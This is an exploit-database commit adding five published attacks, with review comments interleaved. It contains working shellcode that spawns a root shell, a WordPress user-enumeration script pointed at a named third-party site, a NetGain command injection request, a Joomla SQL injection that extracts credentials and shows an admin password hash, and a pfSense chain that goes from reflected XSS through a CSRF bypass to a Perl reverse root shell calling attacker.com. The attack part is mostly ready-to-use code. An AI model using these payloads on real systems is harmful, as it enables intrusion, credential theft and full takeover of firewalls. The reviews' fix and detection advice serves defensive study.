DB: 2017-03-04

5 new exploits

Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)
Wordpress < 4.7.1 - Username Enumeration
NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection
Joomla! Component Coupon 3.5 - SQL Injection
pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery
Offensive Security 2017-03-04 05:01:19 +00:00
parent a3ee969c7d
commit d3106003d4
6 changed files with 446 additions and 0 deletions


@ -15927,6 +15927,7 @@ id,file,description,date,author,platform,type,port
41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86_64 - Random Listener Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0
41477,platforms/linux/shellcode/41477.c,"Linux/x86-64 - Reverse Shell Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",linux,shellcode,0
41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0
41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - Polymorphic Setuid(0) & Execve(/bin/sh) Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
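Review bot: the new 41498 row is internally consistent (platform `lin_x86-64` matches its directory, type `shellcode`, port 0, author quoted), but the index now carries the same architecture under two spellings in the description column: "Linux/x86_64" in the 41468 context row above and "Linux/x86-64" in 41477 and in this row. Pick one spelling for new entries so searches on the description field return the whole set; the 41477 context row also files an x86-64 shellcode under `platforms/linux/` rather than `platforms/lin_x86-64/`, which is worth normalising in a follow-up.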
@ -37411,3 +37412,7 @@ id,file,description,date,author,platform,type,port
41494,platforms/php/webapps/41494.txt,"Joomla! Component StreetGuessr Game 1.0 - SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41495,platforms/php/webapps/41495.txt,"Joomla! Component Guesser 1.0.4 - 'type' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41496,platforms/php/webapps/41496.txt,"Joomla! Component Recipe Manager 2.2 - 'id' Parameter SQL Injection",2017-03-02,"Ihsan Sencan",php,webapps,0
41497,platforms/php/webapps/41497.php,"Wordpress < 4.7.1 - Username Enumeration",2017-03-03,Dctor,php,webapps,0
41499,platforms/jsp/webapps/41499.txt,"NetGain Enterprise Manager 7.2.562 - 'Ping' Command Injection",2017-02-23,MrChaZ,jsp,webapps,0
41500,platforms/php/webapps/41500.txt,"Joomla! Component Coupon 3.5 - SQL Injection",2017-03-03,"Ihsan Sencan",php,webapps,0
41501,platforms/php/webapps/41501.txt,"pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery",2017-03-03,"Yann CAM",php,webapps,0
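Review bot: the description for 41501, "pfSense 2.3.2 - Cross-Site Scripting / Cross-Site Request Forgery", understates the advisory it indexes, whose own title is "XSS - CSRF-bypass & Reverse-root-shell" and whose impact is remote root command execution on the firewall; include the RCE in the description so triage by severity does not miss it. The 41499 row is dated 2017-02-23 (the advisory's own date) while the other new rows carry their submission dates (2017-03-03); one convention should be used across the batch.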


platforms/jsp/webapps/41499.txt Executable file

@ -0,0 +1,43 @@
# Exploit Title: NetGain Enterprise Manager “Ping” Command Injection
# Date: 23.02.2017
# Exploit Author: MrChaZ
# Vendor Homepage: http://www.netgain-systems.com/
# Version: <= v7.2.562 build 853
# Tested on: Windows 10 Pro 64-bit (10,0 Build 14393
Description:
===========================================================================
Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application.
https://www.owasp.org/index.php/Command_Injection
Vulnerable Menu:
===========================================================================
[+] Tools Ping
Proof of Concept:
===========================================================================
POST /u/jsp/tools/exec.jsp HTTP/1.1
Host: 192.168.0.13:8081
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.0.13:8081/u/index.jsp
Content-Length: 97
Cookie: JSESSIONID=542B58462355E4E3B99FAA42842E62FF
Connection: close
Pragma: no-cache
Cache-Control: no-cache
command=cmd+%2Fc+ping&argument=127.0.0.1+%7C+whoami&async_output=ping1487856455258&isWindows=true
-
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=utf-8
Content-Length: 70
Date: Thu, 23 Feb 2017 13:27:40 GMT
Connection: close
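Review bot: the proof of concept stops at the response headers (`Content-Length: 70`) and never shows the body, so the file contains no evidence that `whoami` actually ran; the output that demonstrates execution should be included, with the host name redacted. The root cause is also not stated: the request to `/u/jsp/tools/exec.jsp` carries both the executable (`command=cmd /c ping`) and its argument from the client, and the argument reaches a shell unvalidated, which is why the pipe in `127.0.0.1 | whoami` is interpreted. A fix needs two parts: the server must not accept the command from the client at all (hard-code the ping invocation server-side), and the `argument` field must be validated as an IP address or host name and passed as a separate argv element rather than through `cmd /c`. Minor: the "Tested on" line is missing its closing parenthesis, and the header has no vendor-notification timeline or fixed-version statement, so a reader cannot tell whether 7.2.562 build 853 is the last affected build.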

platforms/lin_x86-64/shellcode/41498.nasm

@ -0,0 +1,50 @@
;The MIT License (MIT)
;Copyright (c) 2017 Robert L. Taylor
;Permission is hereby granted, free of charge, to any person obtaining a
;copy of this software and associated documentation files (the “Software”),
;to deal in the Software without restriction, including without limitation
;the rights to use, copy, modify, merge, publish, distribute, sublicense,
;and/or sell copies of the Software, and to permit persons to whom the
;Software is furnished to do so, subject to the following conditions:
;The above copyright notice and this permission notice shall be included
;in all copies or substantial portions of the Software.
;The Software is provided “as is”, without warranty of any kind, express or
;implied, including but not limited to the warranties of merchantability,
;fitness for a particular purpose and noninfringement. In no event shall the
;authors or copyright holders be liable for any claim, damages or other
;liability, whether in an action of contract, tort or otherwise, arising
;from, out of or in connection with the software or the use or other
;dealings in the Software.
;
; For a detailed explanation of this shellcode see my blog post:
; http://a41l4.blogspot.ca/2017/03/polysetuidexecve1434.html
global _start
section .text
_start:
; setuid(0)
xor edi,edi
push rdi ; null terminator for the following string
push 105
pop rax
; push /bin//sh in reverse
mov rbx,0xd0e65e5edcd2c45e
syscall
; execve
ror rbx,1
mov al,59
push rbx
xchg esi,edi
push rsp
cdq
; store /bin//sh address in RDI, points at string
pop rdi
; Call the Execve syscall
syscall
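Review bot: `mov al,59` (the line after `ror rbx,1`) only yields the execve number if the preceding `setuid(0)` returned 0; when the process is not privileged, setuid fails and leaves a negative errno in rax, so the low byte is overwritten but the high bytes stay set, the syscall number becomes invalid and the shellcode never reaches execve. That is acceptable if the intended target is a setuid-root binary, as the title implies, but the comment block should say so rather than leave the dependency implicit. The rotated constant is correct: `0xd0e65e5edcd2c45e` rotated right by one is `0x68732f2f6e69622f`, the little-endian bytes of "/bin//sh", and the comment "push /bin//sh in reverse" on `mov rbx` would read better next to the `push rbx` that actually pushes it. argv and envp are NULL (rsi via `xchg esi,edi` from the zeroed edi, rdx via `cdq` with a positive eax), which Linux accepts. For detection: because the string only exists in memory after the `ror`, byte signatures on "/bin//sh" will not match this payload at rest; syscall-sequence monitoring (setuid(0) immediately followed by execve from the same thread, via auditd or seccomp logging) is the durable signal.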

platforms/php/webapps/41497.php Executable file

@ -0,0 +1,26 @@
#!usr/bin/php
<?php
#Author: Mateus a.k.a Dctor
#fb: fb.com/hatbashbr/
#E-mail: dctoralves@protonmail.ch
#Site: https://mateuslino.tk
header ('Content-type: text/html; charset=UTF-8');
$url= "https://bucaneiras.org/";
$payload="wp-json/wp/v2/users/";
$urli = file_get_contents($url.$payload);
$json = json_decode($urli, true);
if($json){
echo "*-----------------------------*\n";
foreach($json as $users){
echo "[*] ID : |" .$users['id'] ."|\n";
echo "[*] Name: |" .$users['name'] ."|\n";
echo "[*] User :|" .$users['slug'] ."|\n";
echo "\n";
}echo "*-----------------------------*";}
else{echo "[*] No user";}
?>
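Review bot: the shebang `#!usr/bin/php` is missing the leading slash and will not execute the script directly; it should be `#!/usr/bin/php`, and `header()` has no effect in a CLI run. The target is hard-coded to a specific third-party site (`$url= "https://bucaneiras.org/"`) instead of being taken from an argument, which ties the script to a host the author does not identify as his own and makes it unusable without editing; take the base URL from `$argv[1]`. `file_get_contents()` returns `false` on failure and `json_decode()` of an error page returns `null`, and both fall through to the "No user" branch, so a network error and an empty user list are indistinguishable; check the return value and the `id`/`name`/`slug` keys before printing. On the claim itself: the script only reads `wp-json/wp/v2/users/`, which in WordPress 4.7 lists the users who have published posts; nothing in the file demonstrates or depends on the `< 4.7.1` bound in the title, so the header should either document where that bound comes from or drop it, and it should name the mitigation (restricting the users endpoint to authenticated requests).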

platforms/php/webapps/41500.txt Executable file

@ -0,0 +1,27 @@
# # # # #
# Exploit Title: Joomla! Component Coupon v3.5 - SQL Injection
# Google Dork: inurl:index.php?option=com_coupon
# Date: 03.03.2017
# Vendor Homepage: http://joomla6teen.com/
# Software: https://extensions.joomla.org/extensions/extension/e-commerce/gifts-a-coupons/coupon/
# Demo: http://demo.joomla6teen.com/couponmanager/
# Version: 3.5
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&task=mail_box&=[SQL]
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=[SQL]
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&storeid=[SQL]
# For example;
# DATABASE > demojoom_coupon3
# TABLES > wl6xp_users
# COLUMNS > username, password
# DATA
# http://localhost/[PATH]/index.php?option=com_coupon&view=coupons&catid=7+AND+(SELECT+1+FROM+(SELECT+COUNT(*),CONCAT((SELECT(SELECT+CONCAT(CAST(CONCAT(username,char(58),password)+AS+CHAR),0x7e))+FROM+wl6xp_users+LIMIT+0,1),FLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x)a)
# admin:$2y$10$IeBQiHyJNpZ7mVVNlmW7..Xr5I4tSTlN5Dq7QVltnjtWmaWu2J4
# Etc..
# # # # #
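Review bot: the first injection URL has an empty parameter name (`&task=mail_box&=[SQL]`), so it does not identify which parameter is vulnerable; the name is missing and should be supplied or the line dropped. The "DATA" example reproduces a credential hash pulled from the vendor's public demo site (`demojoom_coupon3`, `wl6xp_users`, `admin:$2y$10$...`); a third party's password hash should be redacted in a published advisory even when the host is a demo. The header lists only operating systems under "Tested on" and gives no vendor-notification date or fixed version, so readers cannot tell whether 3.5 is the last affected release. For the fix, `catid` and `storeid` are numeric identifiers and should be read through Joomla's typed input accessor (`$app->input->getInt('catid')`) or bound as prepared-statement parameters rather than interpolated into the query.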

platforms/php/webapps/41501.txt Executable file

@ -0,0 +1,295 @@
######################################################################
# Exploit Title: pfSense 2.3.2 XSS - CSRF-bypass & Reverse-root-shell
# Date: 01/03/2017
# Author: Yann CAM @ASafety / Synetis
# Vendor or Software Link: www.pfsense.org
# Version: 2.3.2
# Category: XSS, CSRF-bypass and Remote root reverse-shell Access
# Google dork:
# Tested on: FreeBSD
######################################################################
pfSense firewall/router distribution description :
======================================================================
pfSense is a free, open source customized distribution of FreeBSD tailored for use as a firewall and router. In addition
to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package
system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.
pfSense is a popular project with more than 1 million downloads since its inception, and proven in countless installations
ranging from small home networks protecting a PC and an Xbox to large corporations, universities and other organizations
protecting thousands of network devices.
This project started in 2004 as a fork of the m0n0wall project, but focused towards full PC installations rather than the
embedded hardware focus of m0n0wall. pfSense also offers an embedded image for Compact Flash based installations, however
it is not our primary focus.
In version 2.3.2 of the distribution, differents XSS vulnerabilities allow CSRF security mechanisms bypass and RCE reverse
root shell can be triggered. It is strongly advised to update to version 2.3.2 available now.
Demonstration video : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
Proof of Concept 1 - Reflected Cross-Site Scripting :
======================================================================
There are several RXSS in GET parameter available on the pfSense WebGui, example :
File status_captiveportal_expire.php lines 69-73 :
$cpzone = $_GET['zone'];
if (isset($_POST['zone'])) {
$cpzone = $_POST['zone'];
}
$cpzone = strtolower($cpzone);
then reflection lines 100-104 :
$tab_array[] = array(gettext("Active Users"), false, "status_captiveportal.php?zone={$cpzone}");
$tab_array[] = array(gettext("Active Vouchers"), false, "status_captiveportal_vouchers.php?zone={$cpzone}");
$tab_array[] = array(gettext("Voucher Rolls"), false, "status_captiveportal_voucher_rolls.php?zone={$cpzone}");
$tab_array[] = array(gettext("Test Vouchers"), false, "status_captiveportal_test.php?zone={$cpzone}");
$tab_array[] = array(gettext("Expire Vouchers"), true, "status_captiveportal_expire.php?zone={$cpzone}");
List of parameters vulnerable to reflected XSS:
* status_captiveportal.php: "order", "zone"
* status_captiveportal_expire.php: "zone"
* status_captiveportal_test.php: "zone"
* status_captiveportal_voucher_rolls.php: "zone"
* status_captiveportal_vouchers.php: "zone"
Result with a direct call to this page (authenticated session) :
http://<PFSENSE>/status_captiveportal_expire.php?zone="><script>alert(1337);</script>
These RXSS are through GET parameters, so they are triggered directly on page loading (doesn't need any CSRF token).
CSRF token security mechanism protect only RXSS through POST parameters in the pfSense context.
Proof of Concept 2 - Bypass all CSRF protection via R-XSS :
======================================================================
Via the R-XSS in GET parameter identified previously, it's possible for an attacker to bypass all CSRFMagic mechanisms
in the pfSense WebGUI.
Through this XSS in GET param, an attacker can benefit of the current pfSense context in a victim's browser already
logged as administrator in pfSense web administration interface.
Via this XSS, the attacker can forge his own and hidden request in the victim browser, with :
* Right referer for bypassing anti-CSRF mechanisms
* Request page to get a valid CSRF token to forge final form submissions with admin rights
The next piece of JavaScript-JQuery can make any CSRF with right referer and security token retrieved in pfSense context :
// Function with JQuery AJAX request
// This function requests an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '',
success:extractToken
}); // after this request, we called the extractToken() function to extract the token
}
// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
// response var contain the source code of the page requested by AJAX
// Regex to catch the token value
var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
var token = response.match(regex);
token = RegExp.$1;
// Pass the token to the final function which make the CSRF final attack
//alert(token);
makeCSRF(token);
}
If this script is loaded from the previous XSS, all web-forms in the pfSense WebGui can be submitted as a legitimate
and authenticated user (like administrator).
Proof of Concept 3 : R-XSS to CSRF to Remote Reverse root Shell
======================================================================
pfSense distribution provides some internal tools / commands like "perl".
Example of one-liner Perl reverse-root-shell in command line :
[2.3.2-RELEASE][admin@pfSense.localdomain]/usr/local/www: perl -e 'use Socket;$i="[ATTACKER_IP]";$p=[ATTACKER_PORT];socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STen(STDERR,">&S");exec("/bin/sh -i");};'
Plus, through the WebGui as administrator, it's possible to execute system command (shell) directly in the web browser as root user :
http://<PFSENSE>/diag_command.php
POST parameter for command execution to this page are (via PHP script) :
txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=[PAYLOAD]&submit=EXECPHP&__csrf_magic=[CSRFTOKEN]
So, by chaining the R-XSS, bypass any anti-CSRF protection and with some AJAX calls with right referer / right CSRF token,
an attacker can gain a full reverse-shell as root on the pfSense :
1/ Step one : the attacker puts a netcat in listen mode on port 4444 on his computer
$ nc -l -vv -p 4444
2/ Step two : the attacker puts the next x.js JavaScript file on his webserver http://attacker.com/x.js :
var hash = window.location.hash.substring(1);
var lhost = hash.substring(hash.indexOf("lhost=")+6, hash.indexOf("&"));
var lport = hash.substring(hash.indexOf("lport=")+6, hash.length);
var payload='system%28%27%2fusr%2flocal%2fbin%2fperl%20-e%20%5C%27use%20Socket%3B%24i%3D%22' + lhost + '%22%3B%24p%3D' + lport + '%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2fbin%2fsh%20-i%22%29%3B%7D%3B%5C%27%27%29%3B';
// Function with JQuery AJAX request
// This function requests an internal WebGUI page, which contains the token.
// Source code of this webpage is passed to the extractToken() function.
function loadToken(){
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: '',
success:extractToken
}); // after this request, we called the extractToken() function to extract the token
}
// Function called after AJAX request in a defined page of the context, which contains the token value
function extractToken(response){
// response var contain the source code of the page requested by AJAX
// Regex to catch the token value
var regex = new RegExp("<input type='hidden' name='__csrf_magic' value=\"(.*)\" />",'gi');
var token = response.match(regex);
token = RegExp.$1;
// Pass the token to the final function which make the CSRF final attack
//alert(token);
makeCSRF(token);
}
// This function use JQuery AJAX object.
// The token var is needed to perform the right CSRF attack with the context referer
function makeCSRF(token){
// Final CSRF attack with right referer (because executed in the context)
// and with right token captured above
$.ajax({
type: 'POST',
url: '/diag_command.php',
contentType: 'application/x-www-form-urlencoded;charset=utf-8',
dataType: 'text',
data: 'txtCommand=&txtRecallBuffer=&dlPath=&ulfile=&txtPHPCommand=' + payload + '&submit=EXECPHP&__csrf_magic=' + token
}); // payload of your choice
}
if (trigger){
} else {
var trigger = function(){
// Load JQuery dynamically in the targeted context
var headx = document.getElementsByTagName('head')[0];
var jq = document.createElement('script');
jq.type = 'text/javascript';
jq.src = 'http://code.jquery.com/jquery-latest.min.js';
headx.appendChild(jq);
// Waiting 2 secondes for correct loading of JQuery added dynamically.
// Then, run the first AJAX request in the WebGUI context to retrieve the token
setTimeout('loadToken()', 2000);
};
trigger();
}
3/ Step three : the attacker generates the RXSS / anti-CSRF / RCE-root final URL :
http://<PFSENSE>/status_captiveportal_expire.php?zone="><script src="http://attacker.com/x.js"></script>#lhost=[ATTACKER_IP]&lport=[ATTACKER_PORT]
4/ Finaly, the attacker sends this URL (hidden via bitly.com for example) to a pfSense sysadmin and wait for the reverse root shell.
Tested and validated with Firefox latest version 50.1.0.
I have created some BeEF modules to exploit the same vulnerability / scenario.
This full PoC can be seen in the demonstration video here : https://www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
pfSense 2.3.2 contains several security mechanisms and security best-practices like:
- X-Frame-Option header
- POST form-submission token anti-CSRF
- Referer checking to protect against CSRF
But just with a simple RXSS in GET, all these security best-practices can be bypassed to gain a full reverse root shell remotely.
Mitigation:
======================================================================
I suggest to double-check all $_GET/$_POST params directly reflected in the pfSense PHP source code without sanitization.
Plus, some HTTP headers can be added in pfSense for a better security, like:
- X-XSS-Protectoin
- X-Content-Type-Options
- CSP header
- Etc.
Solution:
======================================================================
2017-02-20: Release 2.3.3
Additional resources :
======================================================================
- www.pfsense.org
- www.synetis.com
- blog.pfsense.org/?p=2325
- www.asafety.fr
- www.youtube.com/watch?v=IWtf6LlfP_c&t=4s
- doc.pfsense.org/index.php/2.3.3_New_Features_and_Changes
- pfsense.org/security/advisories/pfSense-SA-17_01.webgui.asc
- github.com/pfsense/pfsense/pull/3288
- github.com/pfsense/pfsense/pull/3288/commits/9ec212fb11e4b2825acda68279c7e9553186c06d
- github.com/pfsense/pfsense/pull/3288/commits/992dd571bcad6508ccea0f478491183d7c7e3c4c
- github.com/beefproject/beef/commit/2f632bcbcd0a73ff2d300110bfdec81986e88285
Report timeline :
======================================================================
2016-12-17 : Vulnerability found
2016-12-18 : pfSense team alerted with details, PoC, mitigation proposal through github pull request
2016-12-18 : pfSense team feedback via github
2017-02-20 : pfSense 2.3.3 release with fix
2017-02-22 : BeEF module pull request
2017-03-01 : Public advisory
Credits :
======================================================================
88888888
88 888 88 88
888 88 88
788 Z88 88 88.888888 8888888 888888 88 8888888.
888888. 88 88 888 Z88 88 88 88 88 88 88
8888888 88 88 88 88 88 88 88 88 888
888 88 88 88 88 88888888888 88 88 888888
88 88 88 8. 88 88 88 88 88 888
888 ,88 8I88 88 88 88 88 88 88 .88 .88
?8888888888. 888 88 88 88888888 8888 88 =88888888
888. 88
88 www.synetis.com
8888 Consulting firm in management and information security
Yann CAM - Security Researcher @ASafety / Security Consultant @Synetis
Last word :
======================================================================
Thank you to all the pfSense team for professionalism and quality solution despite of these few weaknesses.
--
SYNETIS
CONTACT: www.synetis.com
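Review bot: the advisory contradicts itself on the fixed version: the description says "It is strongly advised to update to version 2.3.2", which is the affected version, while the Solution section and the timeline give 2.3.3 (2017-02-20); the sentence should say 2.3.3. The Perl reverse-shell one-liner in PoC 3 is corrupted as published (`open(STen(STDERR,">&S")` has lost the `open(STDOUT,...)` call), so it would not compile; the URL-encoded `payload` in x.js carries the intact form and the plain-text line should match it. In the JavaScript, `new RegExp("... value=\"(.*)\" />",'gi')` uses a greedy `.*`, and `String.prototype.match` under the `g` flag returns only whole matches, so the code relies on the legacy `RegExp.$1` static to recover the token; a non-greedy `(.*?)` with `regex.exec(response)[1]` is the portable form. The `if (trigger){ } else { var trigger = ... }` construct works only because `var` is hoisted, and `setTimeout('loadToken()', 2000)` is both a fixed-delay race against jQuery loading and string evaluation. "X-XSS-Protectoin" in the mitigation list is a typo for X-XSS-Protection. The key defensive point is left implicit and deserves to be explicit: the CSRF token, the referer check and X-Frame-Options all assume no attacker script runs in the origin, so once `$cpzone` is reflected unencoded into the tab hrefs (`status_captiveportal_expire.php?zone={$cpzone}`) every one of them is bypassed from inside the page; the fix that matters is output-encoding `$cpzone` with `htmlspecialchars()` at every reflection point (the advisory lists pfSense PR #3288 as the fix), together with a Content-Security-Policy that disallows script from third-party hosts, which would have blocked the `<script src="http://attacker.com/x.js">` stage even with the reflection present. Since `diag_command.php` with `txtPHPCommand`/`EXECPHP` executes arbitrary PHP as root by design, the advisory could also note that restricting access to that page for administrators who do not need it reduces the blast radius of any future WebGUI XSS.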